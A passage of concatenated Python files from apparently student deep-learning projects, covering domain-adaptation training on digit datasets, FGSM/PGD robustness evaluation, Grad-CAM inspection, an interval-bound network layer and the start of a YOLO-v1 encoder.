targetloader = torch.utils.data.DataLoader(targetset, batch_size=batch_size, shuffle=True)
testtargetloader = torch.utils.data.DataLoader(testtargetset, batch_size=batch_size, shuffle=False)
return sourceloader, targetloader, testtargetloader
class Singleset(torch.utils.data.Dataset):
def __init__(self, data_dir):
self.filelist = os.listdir(data_dir)
self.length = len(self.filelist)
self.trans = torchvision.transforms.ToTensor()
self.data_dir = data_dir
def __len__(self):
return self.length
def __getitem__(self, index):
imgname = self.filelist[index]
imgpath = os.path.join(self.data_dir, imgname)
img = Image.open(imgpath)
img = self.trans(img)
return img, imgname
def make_a_dataloader(data_dir):
singleset = Singleset(data_dir)
singleloader = torch.utils.data.DataLoader(singleset, batch_size=128, shuffle=False)
return singleloader
if __name__ == '__main__':
import sys
sys.path.append('.')
domain_list = ['usps', 'mnistm', 'svhn', 'usps']
for i in range(3):
source = domain_list[i]
target = domain_list[i+1]
print(source, target)
loader1, loader2, loader3 = make_dataloaders(source, target, 128)
for loader in [loader1, loader2, loader3]:
for image, label in loader:
print(image.shape)
print(label.shape)
print(label)
break
print('-====-====-====-')
loader = make_a_dataloader('hw3_data/digits/mnistm/test')
for image, name in loader:
print(name)
print(image.shape)
break
## usps 1 --> 3
```
#### File: 87transfer/module/dsntrainer.py
```python
from dann_module.dsnmodel import DSN, MSE, scale_inv_MSE, DifferenceLoss
from dann_module.datafunc import make_dataloaders, mnist_dataloaders
import torch
from tqdm import tqdm
import numpy as np
import os
torch.manual_seed(7)
torch.cuda.manual_seed_all(100)
torch.backends.cudnn.deterministic = True
class training_options(object):
def __init__(self):
self.lr = 0.01
self.step_decay_weight = 0.95
self.lr_decay_step = 20000
# self.activate_domain_loss_step = 1000
self.activate_domain_loss_step = 10000
self.activate_domain_epoch = 5
self.weight_decay = 1e-6
self.alpha_weight = 0.01
# self.beta_weight = 0.1
self.beta_weight = 0.075
self.gamma_weight = 0.25
# self.gamma_weight = 1
self.momentum = 0.9
def lr_scheduler(self, optimizer, step):
current_lr = self.lr * (self.step_decay_weight ** (step / self.lr_decay_step))
if step % self.lr_decay_step == 0:
print('learning rate is set to %f'%current_lr)
for param_group in optimizer.param_groups:
param_group['lr'] = current_lr
return optimizer
class Trainer():
def __init__(self, args):
args.z_dim = 100
args.n_classes = 10
self.model = DSN(args)
# self.optimizer = torch.optim.Adam(self.model.parameters())
self.class_loss = torch.nn.CrossEntropyLoss()
self.rec_loss = MSE()
self.rec_loss2 = scale_inv_MSE()
self.diff_loss = DifferenceLoss()
self.simi_loss = torch.nn.CrossEntropyLoss()
dataloaders = make_dataloaders(args.source, args.target, args.batch_size)
# dataloaders = mnist_dataloaders(args.batch_size)
self.sourceloader, self.targetloader, self.testtargetloader = dataloaders
self.device = 'cuda' if torch.cuda.is_available() else 'cpu'
object_list = [self.model, self.class_loss, self.rec_loss, self.rec_loss2, self.diff_loss, self.simi_loss]
for object_ in object_list:
object_.to(self.device)
# for parameter in self.model.parameters():
# parameter.requires_grad = True
self.args = args
self.modelpath = os.path.join('ckpt', args.taskname, 'model_%s.pth'%args.target[:2])
self.bestpath = os.path.join('ckpt', args.taskname, 'best_%s.pth'%args.target[:2])
print(self.modelpath)
print(self.bestpath)
self.opt = training_options()
self.optimizer = torch.optim.SGD(self.model.parameters(),
lr=self.opt.lr,
momentum=self.opt.momentum,
weight_decay=self.opt.weight_decay)
def train(self):
print('%s --> %s'%(self.args.source, self.args.target))
best_acc = 0
step = 0
bbar = tqdm(range(self.args.epochs), ncols=100)
# for epoch in range(self.args.epochs):
for epoch in bbar:
self.model.train()
step = self.train_one_epoch(epoch, step)
self.model.eval()
acc = self.test()
torch.save(self.model.state_dict(), self.modelpath)
if acc > best_acc:
best_acc = acc
torch.save(self.model.state_dict(), self.bestpath)
bbar.set_postfix(acc=acc, best_acc=best_acc)
def train_one_epoch(self, epoch, step):
num_iteration = min(len(self.sourceloader), len(self.targetloader))
dann_epoch = int(self.opt.activate_domain_loss_step / num_iteration)
pbar = tqdm(range(num_iteration), ncols=100, desc=str(epoch))
for i in pbar:
#train with target data
self.model.zero_grad()
loss=0
timg, __ = next(iter(self.targetloader))
timg = timg.to(self.device)
batch_size = len(timg)
domain_label = torch.ones(batch_size).long().to(self.device)
dom_acc = 0
sdom_acc = 0
alpha=0
p=0
# if step > self.opt.activate_domain_loss_step:
if epoch > self.opt.activate_domain_epoch:
dann_epoch = self.opt.activate_domain_epoch
p = float(i + (epoch - dann_epoch) * num_iteration) / (self.args.epochs - dann_epoch) / num_iteration
alpha = 2. / (1. + np.exp(-10 * p)) - 1
result = self.model(timg, mode='target', alpha=alpha)
targ_priv_code, targ_share_code, targ_dom_lab, targ_rec = result
target_dann = self.opt.gamma_weight * self.simi_loss(targ_dom_lab, domain_label)
dom_acc = targ_dom_lab.argmax(1).eq(domain_label).float().mean().item()
loss += target_dann
else:
target_dann = torch.zeros(1) # just to fill place
result = self.model(timg, mode='target')
targ_priv_code, targ_share_code, __, targ_rec = result
targ_diff = self.opt.beta_weight * self.diff_loss(targ_priv_code, targ_share_code)
# targ_mse = self.opt.alpha_weight * self.rec_loss(targ_rec, timg)
targ_simse = self.opt.alpha_weight * self.rec_loss2(targ_rec, timg)
loss += (targ_diff + targ_simse)
# loss += (targ_diff + targ_mse + targ_simse)
# self.optimizer.zero_grad()
loss.backward(retain_graph=True)
# loss_t = loss.item()
self.optimizer.step()
# train with source data
self.model.zero_grad()
loss = 0
simg, slabel = next(iter(self.sourceloader))
simg, slabel = simg.to(self.device), slabel.to(self.device)
batch_size = len(simg)
domain_label = torch.zeros(batch_size).long().to(self.device)
# if step > self.opt.activate_domain_loss_step:
if epoch > self.opt.activate_domain_epoch:
result = self.model(simg, mode='source', alpha=alpha)
sour_priv_code, sour_share_code, sour_dom_lab, class_label, sour_rec = result
source_dann = self.opt.gamma_weight * self.simi_loss(sour_dom_lab, domain_label)
sdom_acc = sour_dom_lab.argmax(1).eq(domain_label).float().mean().item()
loss += source_dann
else:
source_dann = torch.zeros(1)
result = self.model(simg, mode='source')
sour_priv_code, sour_share_code, __, class_label, sour_rec = result
class_ = self.class_loss(class_label, slabel)
sour_diff = self.opt.beta_weight * self.diff_loss(sour_priv_code, sour_share_code)
# sour_mse = self.opt.alpha_weight * self.rec_loss(sour_rec, simg)
sour_simse = self.opt.alpha_weight * self.rec_loss2(sour_rec, simg)
loss += (class_ + sour_diff + sour_simse)
# loss=class_
# loss += (class_ + sour_diff + sour_mse + sour_simse)
# print('code?')
# print(sour_priv_code[0][:10])
# print(sour_share_code[0][:10])
#
# print(class_label.shape)
# print(class_label[0])
# print(class_label.argmax(dim=1).cpu().numpy())
# print(slabel)
# input()
class_acc = class_label.argmax(1).eq(slabel).sum().item()*100//len(slabel)
# self.optimizer.zero_grad()
loss.backward(retain_graph=True)
self.optimizer.step()
step += 1
pbar.set_postfix(acc=class_acc, sda=sdom_acc, tda=dom_acc, alpha=alpha, p=p)
return step
def test(self):
correct = 0
length = 0
# pbar = tqdm(self.testtargetloader, ncols=100, desc=self.args.target)
for images, labels in self.testtargetloader:
images, labels = images.to(self.device), labels.to(self.device)
batch_size = len(images)
result = self.model(images, mode='source')
pred = result[3].argmax(1)
# pred = result[3].argmax(1, keepdim=True)
correct += pred.eq(labels).sum().item()
length += batch_size
accuracy = correct *100//length
return accuracy
```
#### File: 87transfer/module/model.py
```python
import torch
import torch.nn as nn
from torch.autograd import Function
class DaNN(nn.Module):
def __init__(self):
super(DaNN, self).__init__()
self.main_features = nn.Sequential(
nn.Conv2d(3, 64, 6, stride=2),
# nn.BatchNorm2d(64),
# nn.MaxPool2d(2),
nn.ReLU(True),
nn.Conv2d(64, 50, 6, stride=2),
# nn.BatchNorm2d(50),
# nn.Dropout2d(),
# nn.MaxPool2d(2),
nn.ReLU(True),
)
self.classifier = nn.Sequential(
nn.Linear(50*4*4, 100),
# nn.BatchNorm1d(100),
nn.ReLU(True),
# nn.Dropout(),
nn.Linear(100,100),
# nn.BatchNorm1d(100),
nn.ReLU(True),
nn.Linear(100, 10),
# nn.LogSoftmax(dim=1),
)
self.domain = nn.Sequential(
nn.Linear(50*4*4, 100),
nn.BatchNorm1d(100),
nn.ReLU(True),
nn.Linear(100,2),
# nn.LogSoftmax(dim=1)
)
self.reverse = ReverseLayerF
self.alpha = 0
def forward(self, images, mode='class'):
# images = images.expand(images.shape[0], 3, 28, 28) ### for usps 1 --> 3
features = self.main_features(images)
features = features.view(-1, 50*4*4)
reverse_feature = self.reverse.apply(features, self.alpha)
if mode == 'class':
output = self.classifier(features)
else:
output = self.domain(reverse_feature)
return output
def _set_alpha(self, alpha):
self.alpha = alpha
def one_seq_chunk(self):
return nn.Sequential(*(list(self.main_features.children()) + [Flatten()] + list(self.classifier.children())))
def update_chunk(self, chunk):
self.main_features.load_state_dict(chunk[:3].state_dict())
chunk_classifier = torch.nn.Sequential(* list(chunk[5:].children()))
self.classifier.load_state_dict(chunk_classifier.state_dict())
class Flatten(nn.Module):
def __init__(self):
super(Flatten, self).__init__()
def forward(self, input):
return input.view(input.size(0), -1)
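# Gradient reversal layer (the DANN trick): the forward pass is the identity,
# while the backward pass negates the incoming gradient and scales it by alpha,
# so the feature extractor is trained to confuse the domain classifier.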
class ReverseLayerF(Function):
@staticmethod
def forward(ctx, x, alpha):
ctx.alpha = alpha
return x.view_as(x)
@staticmethod
def backward(ctx, grad_output):
output = grad_output.neg() * ctx.alpha
return output, None
if __name__ == '__main__':
import torch
model = DaNN()
print(model)
sample = torch.randn(128, 3, 28, 28)
print('sample shape', sample.shape)
    a = model(sample, mode='class')
    b = model(sample, mode='domain')
    print(a.shape)
    print(b.shape)
```
#### File: 87transfer/module/trainer2.py
```python
from module.model import DaNN
from module.datafunc import make_dataloaders
import torch
from tqdm import tqdm
import numpy as np
import os
from convex_adversarial import robust_loss, robust_loss_parallel
torch.manual_seed(7)
torch.cuda.manual_seed_all(100)
torch.backends.cudnn.deterministic = True
class Trainer():
def __init__(self, args):
self.model = DaNN()
self.optimizer = torch.optim.Adam(self.model.parameters())
self.criterion = torch.nn.CrossEntropyLoss()
self.criterion_domain = torch.nn.CrossEntropyLoss()
dataloaders = make_dataloaders(args.source, args.target, args.batch_size)
self.sourceloader = dataloaders[0]
self.sourcetestloader = dataloaders[1]
self.targetloader = dataloaders[2]
self.targettestloader = dataloaders[3]
self.device = 'cuda' if torch.cuda.is_available() else 'cpu'
for to_cuda_obj in [self.model, self.criterion, self.criterion_domain]:
to_cuda_obj.to(self.device)
self.cert = args.cert
self.args = args
stot = (self.args.source[:1], self.args.target[:1])
self.modelpath = os.path.join('ckpt', self.args.taskname, 'model_%s_%s.pth'%stot)
self.certpath = os.path.join('ckpt', self.args.taskname, 'cert_%s_%s.pth'%stot)
def train(self):
print('%s --> %s'%(self.args.source, self.args.target))
print('half')
best_acc = 0
# bbar = range(self.args.epochs)
if self.args.resume is None:
bbar = tqdm(range(self.args.epochs), ncols=100)
for epoch in bbar:
self.model.train()
self.train_one_epoch(epoch)
self.model.eval()
sacc, acc = self.test()
if acc > best_acc:
best_acc = acc
if self.cert:
torch.save(self.model.state_dict(), self.certpath)
else:
torch.save(self.model.state_dict(), self.modelpath)
# print(sacc, acc, best_acc)
bbar.set_postfix(acc=acc, sacc=sacc, best_acc=best_acc)
modelpath = self.certpath if self.cert else self.modelpath
self.model.load_state_dict(torch.load(modelpath))
result = self.attack()
print('source fgsm pgd')
print(result[0][0])
print(result[0][1])
print('target fgsm pgd')
print(result[1][0])
print(result[1][1])
def train_one_epoch(self, epoch):
num_iteration = min(len(self.sourceloader), len(self.targetloader))
pbar = tqdm(range(num_iteration), ncols=100, desc=str(epoch))
for i in pbar:
p = float(i + epoch * num_iteration) / self.args.epochs / num_iteration
alpha = 2. / (1. + np.exp(-10 * p)) - 1
simg, slabel = next(iter(self.sourceloader))
simg, slabel = simg.to(self.device), slabel.to(self.device)
timg, __ = next(iter(self.targetloader))
timg = timg.to(self.device)
## simply split the model into two???
#train with source data
batch_size = len(slabel)
domain_label = torch.zeros(batch_size).long().to(self.device)
            self.model._set_alpha(alpha)  # call the setter; assigning would overwrite the method
if self.cert:
features = self.model.main_features(simg)
features = features.view(-1, 50*4*4)
loss_label, err = robust_loss(self.model.classifier, 0.05, features, slabel)
else:
output = self.model(simg)
loss_label = self.criterion(output, slabel)
domain_output = self.model(simg, mode='domain')
loss_domain = self.criterion_domain(domain_output, domain_label)
# train with target data
batch_size = len(timg)
domain_label = torch.ones(batch_size).long().to(self.device)
domain_output = self.model(timg, mode='domain')
tloss_domain = self.criterion_domain(domain_output, domain_label)
loss = loss_label + loss_domain + tloss_domain
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
pbar.set_postfix(loss=loss_label.item(), d_s_loss=loss_domain.item(), d_t_loss=tloss_domain.item())
def test(self): #source and test
alpha = 0
result = []
for loader in [self.sourcetestloader, self.targettestloader]:
correct = 0
length = 0
for images, labels in loader:
images, labels = images.to(self.device), labels.to(self.device)
batch_size = len(images)
output = self.model(images)
pred = output.argmax(dim=1)
correct += pred.eq(labels).sum().item()
length += batch_size
accuracy = correct *100//length
result.append(accuracy)
return result
def attack(self):
RES = []
for loader in [self.sourcetestloader, self.targettestloader]:
results = []
for desc, attack_f in zip(['FGSM', 'PGD'], [self.FGSM, self.PGD]):
result = []
for eps in tqdm([i*0.01 for i in range(10)], ncols=100, desc=desc):
accuracy = 0
length = 0
for images, target in loader:
images, target = images.cuda(), target.cuda()
pert_image = attack_f(eps, images, target)
output = self.model(pert_image)
pred = output.argmax(dim=1)
accuracy += pred.eq(target).data.sum()
length += len(pred)
result.append(accuracy.item()*100//length)
results.append(result)
print(result)
RES.append(results)
return RES
def FGSM(self, eps, images, target):
## this is
X = images.clone()
X.requires_grad = True
output = self.model(X)
loss = self.criterion(output, target)
loss.backward()
grad_sign = X.grad.data.sign()
return (X + eps*grad_sign).clamp(0, 1)
def PGD(self, eps, images, target):
X_orig = images.clone()
X_var = images.clone()
for __ in range(40):
X = X_var.clone()
X.requires_grad = True
output = self.model(X)
loss = self.criterion(output, target)
loss.backward()
grad_sign = X.grad.data.sign()
X_var = X_var + 0.05*grad_sign
# X_var.clamp(X_orig-eps, X_orig+eps)
X_var = torch.where(X_var < X_orig-eps, X_orig-eps, X_var)
X_var = torch.where(X_var > X_orig+eps, X_orig+eps, X_var)
            X_var = X_var.clamp(0, 1)
return X_var
```
#### File: Attention/module/datafunc.py
```python
from torch.utils import data
from torchvision import datasets
from torchvision import transforms
#main function to be called
def make_dataloader(data_dir_root, datatype, img_size, batch_size):
if datatype=='mnist':
dataset = MNIST(data_dir_root, img_size, True)
train_loader = data.DataLoader(dataset, batch_size=batch_size, shuffle=True)
dataset = MNIST(data_dir_root, img_size, False)
test_loader = data.DataLoader(dataset, batch_size=batch_size, shuffle=True)
elif datatype=='cifar10':
dataset = CIFAR10(data_dir_root, img_size, True)
train_loader = data.DataLoader(dataset, batch_size=batch_size, shuffle=True)
dataset = CIFAR10(data_dir_root, img_size, False)
test_loader = data.DataLoader(dataset, batch_size=batch_size, shuffle=True)
return train_loader, test_loader
#list of datasets to use
def MNIST(data_dir_root, img_size, train):
trans = transforms.Compose([
transforms.Resize(img_size),
transforms.ToTensor(),
# transforms.Normalize(mean=(0.5,0.5,0.5), std=(0.5,0.5,0.5))
])
dataset = datasets.MNIST(
data_dir_root, train=train, download=True, transform=trans
)
return dataset
def CIFAR10(data_dir_root, img_size, train):
trans = transforms.Compose([
transforms.Resize(img_size),
transforms.ToTensor(),
transforms.Normalize(mean=(0.5,0.5,0.5), std=(0.5,0.5,0.5))
])
dataset = datasets.CIFAR10(
data_dir_root, train=train, download=True, transform=trans
)
return dataset
```
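A minimal usage sketch for the loader factory above; the data root and sizes are placeholder values, not taken from the repository:
```python
# Build MNIST train/test loaders; './data' and the sizes are illustrative only.
train_loader, test_loader = make_dataloader('./data', 'mnist', img_size=32, batch_size=64)
images, labels = next(iter(train_loader))
print(images.shape)  # expected: torch.Size([64, 1, 32, 32])
```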
#### File: Attention/module/trainer.py
```python
from module.model import LeNet5
from module.datafunc import make_dataloader, MNIST
from module.utils import check_directories
from grad_cam import GradCAM, BackPropagation
import torch
from torch import optim
import torch.nn as nn
from torch.autograd import Variable
from torchvision.utils import save_image
from torchvision import transforms
from tqdm import tqdm
import numpy as np
import cv2
import glob
class Trainer():
def __init__(self, config, args, opt):
self.model = LeNet5(args)
self.optimizer = optim.Adam(self.model.parameters(), lr=args.lr, betas=args.betas)
self.criterion = nn.CrossEntropyLoss()
self.config = config
self.args = args
self.opt = opt
self.device = 'cuda' if torch.cuda.is_available() else 'cpu'
if self.device =='cuda':
self.model.cuda()
def main_inspection(self):
# images = [cv2.imread(file) for file in glob.glob(self.opt.task_dir+'/adsamples/*.png')]
# for raw_image in images:
# # raw_image = cv2.imread(self.opt.task_dir+'/adsamples')
# # raw_image = cv2.imread(image_path)[..., ::-1]
# image = transforms.Compose(
# [
# transforms.ToTensor(),
# # transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
# ]
# )(raw_image).unsqueeze(0)
# image = image.to(self.device)
# self.inspect_one(image)
for i,img in enumerate(self.origsamples):
self.inspect_one(img, 'o'+str(i))
for i,img in enumerate(self.adsamples):
# save_image(img, 'myresults/test.png')
self.inspect_one(img, 'a'+str(i))
def inspect_one(self, image, name):
def save_gradcam(filename, gcam, raw_image):
# print(raw_image.shape)
h, w, __= raw_image.shape
gcam = cv2.resize(gcam, (w, h))
gcam = cv2.applyColorMap(np.uint8(gcam * 255.0), cv2.COLORMAP_JET)
            gcam = gcam.astype(float)/100 + raw_image.astype(float)  # np.float is removed in recent NumPy
gcam = gcam / gcam.max() * 255.0
cv2.imwrite(filename, np.uint8(gcam))
# print("Grad-CAM")
bp = BackPropagation(model=self.model)
predictions = bp.forward(image)
print(predictions)
bp.remove_hook()
gcam = GradCAM(model=self.model)
_ = gcam.forward(image)
classes = list(range(10))
# print(self.model)
for i in range(1):
# print("[{:.5f}] {}".format(predictions[i][0], classes[predictions[i][1]]))
# Grad-CAM
gcam.backward(idx=predictions[i][1])
region = gcam.generate(target_layer='conv')
img = image.squeeze().detach().cpu().numpy()
rgbimg = cv2.cvtColor(img,cv2.COLOR_GRAY2RGB)
save_gradcam(
"myresults/{}-{}-{}.png".format(
name, 'conv', classes[predictions[i][1]]
),
region,
rgbimg,
)
def load(self):
self.model.load(self.opt.model_filepath)
def adversary(self):
print('adversary for task:', self.config.taskname)
adsample_path = self.opt.task_dir+'/adsamples'
check_directories([adsample_path])
self.adsamples = []
self.origsamples = []
test_set = MNIST(self.config.data_dir_root, self.args.img_size, False)
epsilon = 0.3
count = 1
list_ = []
for i in range(len(test_set)):
image, target = test_set[i]
image = image.to(self.device)
image = image.unsqueeze(0)
target = torch.LongTensor([target]).to(self.device)
output = self.model(image)
if not output.argmax(dim=1).eq(target):
continue
elif target in list_:
continue
self.origsamples.append(image)
list_.append(target)
image.requires_grad = True
output = self.model(image)
loss = self.criterion(output, target)
self.model.zero_grad()
loss.backward()
gradient = image.grad.data
adimg = self.FGSM(image, epsilon, gradient)
self.adsamples.append(adimg)
pred = self.model(adimg).argmax(dim=1).item()
save_image(adimg.cpu(), adsample_path+'/sample%d_%d-%d.png'%(count, target.item(), pred))
count+=1
if count > 10:
break
def FGSM(self,img, eps, grad):
adimg = img + eps*grad.sign()
adimg = torch.clamp(adimg, 0, 1)
return adimg
def train(self):
print('training for task:', self.config.taskname)
train_loader, test_loader = make_dataloader( self.config.data_dir_root,
self.config.datatype,
self.args.img_size,
self.args.batch_size)
print('train %d #'%self.opt.epochs, 'save at %s'%self.opt.task_dir)
for i in range(self.opt.epochs):
self.train_one_epoch(train_loader)
self.test(test_loader)
self.model.save(self.opt.model_filepath)
def train_one_epoch(self, train_loader):
pbar = tqdm(train_loader)
for inputs, targets in pbar:
inputs = inputs.to(self.device)
targets = targets.to(self.device)
output = self.model(inputs)
loss = self.criterion(output, targets)
self.model.zero_grad()
loss.backward()
self.optimizer.step()
pred = output.argmax(dim=1, keepdim=True)
accuracy = pred.eq(targets.view_as(pred)).sum().item()
accuracy = accuracy/len(targets) * 100
message = 'loss: %.4f, accuracy: %.2f %%'%(loss.item(), accuracy)
pbar.set_description(message)
def test(self, test_loader):
pbar = tqdm(test_loader)
accuracy = 0
total = 0
for inputs, targets in pbar:
inputs = inputs.to(self.device)
targets = targets.to(self.device)
output = self.model(inputs)
pred = output.argmax(dim=1, keepdim=True)
accuracy += pred.eq(targets.view_as(pred)).sum().item()
total += len(pred)
accuracy = accuracy/total * 100
message = 'test accuracy: %d'%accuracy
print(message)
```
#### File: module/model_package/mwdnet.py
```python
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.parameter import Parameter
from torch.autograd.function import Function
from model_package.loss_bound import BoundedParameter
class MWDNet(nn.Module):
def __init__(self, args, init_channel):
super(MWDNet, self).__init__()
self.layers = nn.ModuleList()
in_channel = init_channel
for i, channel_size in enumerate(args.layer_sizes):
l = unit(in_channel, channel_size,
andor=args.andor[i])
self.layers.append(l)
in_channel = channel_size
def forward(self, x):
x = x.flatten(1)
for l in self.layers:
x = l(x)
return x
def interval_forward(self, x_min, x_max):
x_min, x_max = x_min.flatten(1), x_max.flatten(1)
for l in self.layers:
x_min, x_max = l.interval_forward(x_min, x_max)
return x_min, x_max
def sensitivity(self):
s = None
for l in self.layers:
s = l.sensitivity(s)
return torch.max(s)
# can this work?
def save(self, filepath):
state = {
'net': self.layers.state_dict(),
}
torch.save(state, filepath)
def load(self, filepath):
state = torch.load(filepath)
self.layers.load_state_dict(state['net'])
class LargeAttractorExp(Function):
"""Implements e^-x with soft derivative."""
@staticmethod
def forward(ctx, x):
ctx.save_for_backward(x)
return torch.exp(-x)
@staticmethod
def backward(ctx, grad_output):
x = ctx.saved_tensors[0]
return - grad_output / torch.sqrt(1. + x)
class SharedFeedbackMax(Function):
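    """Max over the last dimension with a softened backward pass: instead of
    routing the gradient only to the argmax, it is spread over all inputs with
    weights exp(x - max(x))."""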
@staticmethod
def forward(ctx, x):
y, _ = torch.max(x, -1)
ctx.save_for_backward(x, y)
return y
@staticmethod
def backward(ctx, grad_output):
x, y = ctx.saved_tensors
y_complete = y.view(list(y.shape) + [1])
d_complete = grad_output.view(list(grad_output.shape) + [1])
return d_complete * torch.exp(x - y_complete)
class unit(nn.Module):
def __init__(self, in_features, out_features, andor="*",
min_input=0.0, max_input=0.0, min_slope=0.001, max_slope=10.0):
super(unit, self).__init__()
self.in_features = in_features
self.out_features = out_features
self.andor = andor
self.modinf = True #modinf
self.regular_deriv = False
self.w = BoundedParameter(torch.Tensor(out_features, in_features),
lower_bound=min_input, upper_bound=max_input)
self.u = BoundedParameter(torch.Tensor(out_features, in_features),
lower_bound=min_slope, upper_bound=max_slope)
if andor == 'v':
self.andor01 = Parameter(torch.ones((1, out_features)))
elif andor == '^':
self.andor01 = Parameter(torch.zeros((1, out_features)))
else:
self.andor01 = Parameter(torch.Tensor(1, out_features))
self.andor01.data.random_(0, 2)
self.andor01.requires_grad = False
self.w.data.uniform_(min_input, max_input)
# Initialization of u.
self.u.data.uniform_(0.2, 0.7) # These could be parameters.
self.u.data.clamp_(min_slope, max_slope)
def forward(self, x):
# Let n be the input size, and m the output size.
# The tensor x is of shape * n. To make room for the output,
# we view it as of shape * 1 n.
# Aggregates into a modulus.
xx = x.unsqueeze(-2)
xuw = self.u * (xx - self.w)
xuwsq = xuw * xuw
if self.modinf:
# We want to get the largest square, which is the min one as we changed signs.
if self.regular_deriv:
z, _ = torch.max(xuwsq, -1)
y = torch.exp(- z)
else:
z = SharedFeedbackMax.apply(xuwsq)
y = LargeAttractorExp.apply(z)
else:
z = torch.sum(xuwsq, -1)
if self.regular_deriv:
y = torch.exp(- z)
else:
y = LargeAttractorExp.apply(z)
# Takes into account and-orness.
if self.andor == '^':
return y
elif self.andor == 'v':
return 1.0 - y
else:
return y + self.andor01 * (1.0 - 2.0 * y)
def interval_forward(self, x_min, x_max):
xx_min = x_min.unsqueeze(-2)
xx_max = x_max.unsqueeze(-2)
xuw1 = self.u * (xx_min - self.w)
xuwsq1 = xuw1 * xuw1
xuw2 = self.u * (xx_max - self.w)
xuwsq2 = xuw2 * xuw2
sq_max = torch.max(xuwsq1, xuwsq2)
sq_min = torch.min(xuwsq1, xuwsq2)
# If w is between x_min and x_max, then sq_min should be 0.
# So we multiply sq_min by something that is 0 if x_min < w < x_max.
sq_min = sq_min * ((xx_min > self.w) + (self.w > xx_max)).float()
y_min = torch.exp(- torch.max(sq_max, -1)[0])
y_max = torch.exp(- torch.max(sq_min, -1)[0])
# Takes into account and-orness.
if self.andor == '^':
return y_min, y_max
elif self.andor == 'v':
return 1.0 - y_max, 1.0 - y_min
else:
y1 = y_min + self.andor01 * (1.0 - 2.0 * y_min)
y2 = y_max + self.andor01 * (1.0 - 2.0 * y_max)
y_min = torch.min(y1, y2)
y_max = torch.max(y1, y2)
return y_min, y_max
def overall_sensitivity(self):
"""Returns the sensitivity to adversarial examples of the layer."""
if self.modinf:
s = torch.max(torch.max(self.u, -1)[0], -1)[0].item()
else:
            s = torch.max(torch.sqrt(torch.sum(self.u * self.u, -1))).item()
s *= np.sqrt(2. / np.e)
return s
def sensitivity(self, previous_layer):
"""Given the sensitivity of the previous layer (a vector of length equal
to the number of inputs), it computes the sensitivity to adversarial examples
of the current layer, as a vector of length equal to the output size of the
layer. If the input sensitivity of the previous layer is None, then unit
sensitivity is assumed."""
if previous_layer is None:
previous_layer = self.w.new(1, self.in_features)
previous_layer.fill_(1.)
else:
previous_layer = previous_layer.view(1, self.in_features)
u_prod = previous_layer * self.u
if self.modinf:
# s = torch.max(u_prod, -1)[0]
s = SharedFeedbackMax.apply(u_prod)
else:
s = torch.sqrt(torch.sum(u_prod * u_prod, -1))
s = s * np.sqrt(2. / np.e)
return s
def dumps(self):
"""Writes itself to a string."""
# Creates a dictionary
d = dict(
in_features=self.in_features,
out_features=self.out_features,
min_input=self.w.lower_bound,
max_input=self.w.upper_bound,
min_slope=self.u.lower_bound,
max_slope=self.u.upper_bound,
modinf=self.modinf,
regular_deriv=self.regular_deriv,
andor=self.andor,
andor01=self.andor01.cpu().numpy(),
u=self.u.data.cpu().numpy(),
w=self.w.data.cpu().numpy(),
)
return Serializable.dumps(d)
```
#### File: 00template/convex_adversarial/dual.py
```python
import torch.nn as nn
from abc import ABCMeta, abstractmethod
class DualObject(nn.Module, metaclass=ABCMeta):
def __init__(self):
""" Initialize a dual layer by initializing the variables needed to
compute this layer's contribution to the upper and lower bounds.
In the paper, if this object is at layer i, this is initializing `h'
with the required cached values when nu[i]=I and nu[i]=-I.
"""
super(DualObject, self).__init__()
@abstractmethod
def apply(self, dual_layer):
""" Advance cached variables initialized in this class by the given
dual layer. """
raise NotImplementedError
@abstractmethod
def bounds(self):
""" Return this layers contribution to the upper and lower bounds. In
the paper, this is the `h' upper bound where nu is implicitly given by
c=I and c=-I. """
raise NotImplementedError
@abstractmethod
def objective(self, *nus):
""" Return this layers contribution to the objective, given some
backwards pass. In the paper, this is the `h' upper bound evaluated on a
the given nu variables.
If this is layer i, then we get as input nu[k] through nu[i].
So non-residual layers will only need nu[-1] and nu[-2]. """
raise NotImplementedError
class DualLayer(DualObject):
@abstractmethod
def forward(self, *xs):
""" Given previous inputs, apply the affine layer (forward pass) """
raise NotImplementedError
@abstractmethod
def T(self, *xs):
""" Given previous inputs, apply the transposed affine layer
(backward pass) """
raise NotImplementedError
``` |
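The two abstract classes above only fix an interface; as an illustration (not part of the library), a do-nothing dual layer that satisfies it could look like the following sketch, where the class name and the zero contributions are assumptions made purely to show how apply/bounds/objective/forward/T fit together:
```python
# Illustrative skeleton of a concrete DualLayer; assumes DualLayer from dual.py is in scope.
class DualIdentity(DualLayer):
    """Dual form of an identity map: contributes nothing to bounds or objective."""
    def apply(self, dual_layer):
        pass                       # no cached variables to advance

    def bounds(self):
        return 0.0, 0.0            # (lower, upper) contribution

    def objective(self, *nus):
        return 0.0                 # no contribution to the dual objective

    def forward(self, *xs):
        return xs[-1]              # identity affine layer (forward pass)

    def T(self, *xs):
        return xs[-1]              # its transpose is also the identity (backward pass)
```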
{
"source": "5loaves-2fish-12basckets/YOLO-v1",
"score": 2
} |
#### File: YOLO-v1/module/predfunc.py
```python
import torch
# def _decoder(pred):
# for i in range(7):
# for j in range(7):
# cell = pred[i][j]
def encoder(boxes, labels): ## length is ratio
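    # Target tensor layout per 7x7 grid cell (26 channels):
    #   [0:2] box-1 center offset inside the cell, [2:4] box-1 width/height (image ratio), [4] box-1 confidence,
    #   [5:7]/[7:9]/[9] the same fields duplicated for box 2, [10:26] one-hot class label.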
target = torch.zeros((7,7,26))
cell_size = 1./7
width_height = boxes[:,2:] - boxes[:,:2]
center_x_ys = (boxes[:,2:]+ boxes[:,:2])/2
for it, center_x_y in enumerate(center_x_ys):
cell_i_j = (center_x_y/cell_size).ceil() - 1
i = int(cell_i_j[1])
j = int(cell_i_j[0])
target[i, j, 4] = 1
target[i, j, 9] = 1
target[i, j, int(labels[it]+9)] = 1
tl_x_y = cell_i_j * cell_size
delta_x_y = (center_x_y - tl_x_y) / cell_size
target[i, j, 2:4] = width_height[it]
target[i, j, :2] = delta_x_y
target[i, j, 7:9] = width_height[it]
target[i, j, 5:7] = delta_x_y
return target
def _decoder(pred, thresh=0.01):
boxes=[]
cls_indexs=[]
probs = []
cell_size = 448/7
img_size = 448.
pred = pred.data
pred = pred.squeeze(0) #7x7x26
contain1 = pred[:,:,4].unsqueeze(2) # 7,7,1
contain2 = pred[:,:,9].unsqueeze(2)
contain = torch.cat((contain1,contain2),2) # 7,7,2
